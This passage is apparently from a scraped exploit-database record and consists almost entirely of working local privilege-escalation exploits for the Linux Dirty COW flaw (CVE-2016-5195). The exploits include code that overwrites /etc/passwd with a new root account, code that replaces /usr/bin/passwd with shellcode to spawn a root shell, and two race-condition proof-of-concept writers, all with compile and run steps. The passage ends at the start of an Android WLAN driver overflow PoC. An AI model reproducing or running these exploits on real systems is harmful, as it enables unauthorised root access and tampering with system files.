foo\r\nthis is not a test\r\n$ gcc -lpthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n \r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3)return 1;\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %x\\n\\n\",map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\r\n\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25944", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-28T03:24:54", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/p", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26430", "id": "1337DAY-ID-26430", "sourceData": "// EDB-Note: After getting a shell, doing \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\" may make the system more stable.\r\n//\r\n// This exploit uses the pokemon exploit of the dirtycow vulnerability\r\n// as a base and automatically generates a new passwd line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// The original /etc/passwd file is then backed up to /tmp/passwd.bak\r\n// and overwrites the root account with the generated line.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// To use this exploit modify the user values according to your needs.\r\n// The default is \"firefart\".\r\n//\r\n// Original exploit (dirtycow's ptrace_pokedata \"pokemon\" method):\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// Compile with:\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// Then run the newly create binary by either doing:\r\n// \"./dirty\" or \"./dirty my-new-password\"\r\n//\r\n// Afterwards, you can either \"su firefart\" or \"ssh [email\u00a0protected]\"\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!\r\n// mv /tmp/passwd.bak /etc/passwd\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n \r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n \r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n \r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n \r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n \r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n \r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n \r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n \r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n \r\n char ch;\r\n FILE *source, *target;\r\n \r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n \r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n \r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n \r\n fclose(source);\r\n fclose(target);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n \r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n \r\n char *plaintext_pw;\r\n \r\n if (argc >= 2) {\r\n plaintext_pw = argv[1];\r\n printf(\"Please enter the new password: %s\\n\", plaintext_pw);\r\n } else {\r\n plaintext_pw = getpass(\"Please enter the new password: \");\r\n }\r\n \r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n \r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n \r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}\n\n# 0day.today [2018-03-28] #", "sourceHref": "https://0day.today/exploit/26430", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T23:25:08", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25952", "id": "1337DAY-ID-25952", "sourceData": "/*\r\n* (un)comment correct payload first (x86 or x64)!\r\n* \r\n* $ gcc cowroot.c -o cowroot -pthread\r\n* $ ./cowroot\r\n* DirtyCow root privilege escalation\r\n* Backing up /usr/bin/passwd.. to /tmp/bak\r\n* Size of binary: 57048\r\n* Racing, this may take a while..\r\n* /usr/bin/passwd is overwritten\r\n* Popping root shell.\r\n* Don't forget to restore /tmp/bak\r\n* thread stopped\r\n* thread stopped\r\n* [email\u00a0protected]:/root/cow# id\r\n* uid=0(root) gid=1000(foo) groups=1000(foo)\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n \r\nvoid *map;\r\nint f;\r\nint stop = 0;\r\nstruct stat st;\r\nchar *name;\r\npthread_t pth1,pth2,pth3;\r\n \r\n// change if no permissions to read\r\nchar suid_binary[] = \"/usr/bin/passwd\";\r\n \r\n/*\r\n* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\n*/\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,\r\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,\r\n 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,\r\n 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,\r\n 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05\r\n};\r\nunsigned int sc_len = 177;\r\n \r\n/*\r\n* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,\r\n 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\r\n 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,\r\n 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,\r\n 0x89, 0xe1, 0xcd, 0x80\r\n};\r\nunsigned int sc_len = 136;\r\n*/\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f, str, sc_len);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n \r\nvoid *waitForWrite(void *arg) {\r\n char buf[sc_len];\r\n \r\n for(;;) {\r\n FILE *fp = fopen(suid_binary, \"rb\");\r\n \r\n fread(buf, sc_len, 1, fp);\r\n \r\n if(memcmp(buf, sc, sc_len) == 0) {\r\n printf(\"%s is overwritten\\n\", suid_binary);\r\n break;\r\n }\r\n \r\n fclose(fp);\r\n sleep(1);\r\n }\r\n \r\n stop = 1;\r\n \r\n printf(\"Popping root shell.\\n\");\r\n printf(\"Don't forget to restore /tmp/bak\\n\");\r\n \r\n system(suid_binary);\r\n}\r\n \r\nint main(int argc,char *argv[]) {\r\n char *backup;\r\n \r\n printf(\"DirtyCow root privilege escalation\\n\");\r\n printf(\"Backing up %s.. to /tmp/bak\\n\", suid_binary);\r\n \r\n asprintf(&backup, \"cp %s /tmp/bak\", suid_binary);\r\n system(backup);\r\n \r\n f = open(suid_binary,O_RDONLY);\r\n fstat(f,&st);\r\n \r\n printf(\"Size of binary: %d\\n\", st.st_size);\r\n \r\n char payload[st.st_size];\r\n memset(payload, 0x90, st.st_size);\r\n memcpy(payload, sc, sc_len+1);\r\n \r\n map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n \r\n printf(\"Racing, this may take a while..\\n\");\r\n \r\n pthread_create(&pth1, NULL, &madviseThread, suid_binary);\r\n pthread_create(&pth2, NULL, &procselfmemThread, payload);\r\n pthread_create(&pth3, NULL, &waitForWrite, NULL);\r\n \r\n pthread_join(pth3, NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/25952", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-17T21:28:04", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition PoC (Write Access) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26429", "id": "1337DAY-ID-26429", "sourceData": "// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball\r\n#include <fcntl.h> //// pikachu\r\n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball\r\n#include <string.h> //// pokeball\r\n#include <stdio.h> //// (___)\r\n#include <stdint.h> //// (o o)_____/\r\n#include <sys/mman.h> //// @@ ` \\ \r\n#include <sys/types.h> //// \\ ____, /miltank\r\n#include <sys/stat.h> //// // //\r\n#include <sys/wait.h> //// ^^ ^^\r\n#include <sys/ptrace.h> //// mmap bc757000\r\n#include <unistd.h> //// madvise 0\r\n////////////////////////////////////////////// ptrace 0\r\n////////////////////////////////////////////// miltank\r\n//////////////////////////////////////////////\r\nint f ;// file descriptor\r\nvoid *map ;// memory map\r\npid_t pid ;// process id\r\npthread_t pth ;// thread\r\nstruct stat st ;// file info\r\n//////////////////////////////////////////////\r\nvoid *madviseThread(void *arg) {// madvise thread\r\n int i,c=0 ;// counters\r\n for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8\r\n c+=madvise(map,100,MADV_DONTNEED) ;// race condition\r\n printf(\"madvise %d\\n\\n\",c) ;// sum of errors\r\n }// /madvise thread\r\n//////////////////////////////////////////////\r\nint main(int argc,char *argv[]) {// entrypoint\r\n if(argc<3)return 1 ;// ./d file contents\r\n printf(\"%s \\n\\\r\n (___) \\n\\\r\n (o o)_____/ \\n\\\r\n @@ ` \\\\ \\n\\\r\n \\\\ ____, /%s \\n\\\r\n // // \\n\\\r\n ^^ ^^ \\n\\\r\n\", argv[1], argv[2]) ;// dirty cow\r\n f=open(argv[1],O_RDONLY) ;// open read only file\r\n fstat(f,&st) ;// stat the fd\r\n map=mmap(NULL ,// mmap the file\r\n st.st_size+sizeof(long) ,// size is filesize plus padding\r\n PROT_READ ,// read-only\r\n MAP_PRIVATE ,// private mapping for cow\r\n f ,// file descriptor\r\n 0) ;// zero\r\n printf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code\r\n pid=fork() ;// fork process\r\n if(pid) {// if parent\r\n waitpid(pid,NULL,0) ;// wait for child\r\n int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)\r\n for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l\r\n for(o=0;o<l;o++)//////////////////////// repeat for each byte\r\n for(u=0;u<10000;u++)////////////////// try 10K times each time\r\n c+=ptrace(PTRACE_POKETEXT ,// inject into memory\r\n pid ,// process id\r\n map+o ,// address\r\n *((long*)(argv[2]+o))) ;// value\r\n printf(\"ptrace %d\\n\\n\",c) ;// sum of error code\r\n }// otherwise\r\n else {// child\r\n pthread_create(&pth ,// create new thread\r\n NULL ,// null\r\n madviseThread ,// run madviseThred\r\n NULL) ;// null\r\n ptrace(PTRACE_TRACEME) ;// stat ptrace on child\r\n kill(getpid(),SIGSTOP) ;// signal parent\r\n pthread_join(pth,NULL) ;// wait for thread\r\n }// / child\r\n return 0 ;// return\r\n }// / entrypoint\r\n//////////////////////////////////////////////\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26429"}, {"lastseen": "2018-01-05T07:15:40", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Local Root Proof Of Concept Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25943", "id": "1337DAY-ID-25943", "sourceData": "/*\r\n* (un)comment correct payload first (x86 or x64)!\r\n* \r\n* $ gcc cowroot.c -o cowroot -pthread\r\n* $ ./cowroot\r\n* DirtyCow root privilege escalation\r\n* Backing up /usr/bin/passwd.. to /tmp/bak\r\n* Size of binary: 57048\r\n* Racing, this may take a while..\r\n* /usr/bin/passwd overwritten\r\n* Popping root shell.\r\n* Don't forget to restore /tmp/bak\r\n* thread stopped\r\n* thread stopped\r\n* [email\u00a0protected]:/root/cow# id\r\n* uid=0(root) gid=1000(foo) groups=1000(foo)\r\n*\r\n* @robinverton \r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nvoid *map;\r\nint f;\r\nint stop = 0;\r\nstruct stat st;\r\nchar *name;\r\npthread_t pth1,pth2,pth3;\r\n\r\n// change if no permissions to read\r\nchar suid_binary[] = \"/usr/bin/passwd\";\r\n\r\n/*\r\n* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\n*/ \r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,\r\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,\r\n 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,\r\n 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,\r\n 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05\r\n};\r\nunsigned int sc_len = 177;\r\n\r\n/*\r\n* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,\r\n 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\r\n 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,\r\n 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,\r\n 0x89, 0xe1, 0xcd, 0x80\r\n};\r\nunsigned int sc_len = 136;\r\n*/\r\n\r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f, str, sc_len);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *waitForWrite(void *arg) {\r\n char buf[sc_len];\r\n\r\n for(;;) {\r\n FILE *fp = fopen(suid_binary, \"rb\");\r\n\r\n fread(buf, sc_len, 1, fp);\r\n\r\n if(memcmp(buf, sc, sc_len) == 0) {\r\n printf(\"%s overwritten\\n\", suid_binary);\r\n break;\r\n }\r\n\r\n fclose(fp);\r\n sleep(1);\r\n }\r\n\r\n stop = 1;\r\n\r\n printf(\"Popping root shell.\\n\");\r\n printf(\"Don't forget to restore /tmp/bak\\n\");\r\n\r\n system(suid_binary);\r\n}\r\n\r\nint main(int argc,char *argv[]) {\r\n char *backup;\r\n\r\n printf(\"DirtyCow root privilege escalation\\n\");\r\n printf(\"Backing up %s to /tmp/bak\\n\", suid_binary);\r\n\r\n asprintf(&backup, \"cp %s /tmp/bak\", suid_binary);\r\n system(backup);\r\n\r\n f = open(suid_binary,O_RDONLY);\r\n fstat(f,&st);\r\n\r\n printf(\"Size of binary: %d\\n\", st.st_size);\r\n\r\n char payload[st.st_size];\r\n memset(payload, 0x90, st.st_size);\r\n memcpy(payload, sc, sc_len+1);\r\n\r\n map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n\r\n printf(\"Racing, this may take a while..\\n\");\r\n\r\n pthread_create(&pth1, NULL, &madviseThread, suid_binary);\r\n pthread_create(&pth2, NULL, &procselfmemThread, payload);\r\n pthread_create(&pth3, NULL, &waitForWrite, NULL);\r\n\r\n pthread_join(pth3, NULL);\r\n\r\n return 0;\r\n}\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/25943", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:51", "description": "", "published": "2016-01-25T00:00:00", "type": "packetstorm", "title": "Linux Kernel prima WLAN Driver Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0569"], "modified": "2016-01-25T00:00:00", "id": "PACKETSTORM:135372", "href": "https://packetstormsecurity.com/files/135372/Linux-Kernel-prima-WLAN-Driver-Heap-Overflow.html", "sourceData": "`/* \n* Coder: Shawn the R0ck, [citypw@gmail.com] \n* Co-worker: Pray3r, [pray3r.z@gmail.com] \n* Compile: \n* # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie \n* # ./a.out wlan0 \n* Boom......shit happens[ as always];-) \n*/ \n \n#include <stdio.h> \n#include <string.h> \n#include <stdlib.h> \n#include <sys/ioctl.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <linux/wireless.h> \n#include <errno.h> \n \ntypedef unsigned char v_U8_t; \n#define HDD_MAX_CMP_PER_PACKET_FILTER 5 \n \nstruct PacketFilterParamsCfg { \nv_U8_t protocolLayer; \nv_U8_t cmpFlag; \nv_U8_t dataOffset; \nv_U8_t dataLength; \nv_U8_t compareData[8]; \nv_U8_t dataMask[8]; \n}; \n \ntypedef struct { \nv_U8_t filterAction; \nv_U8_t filterId; 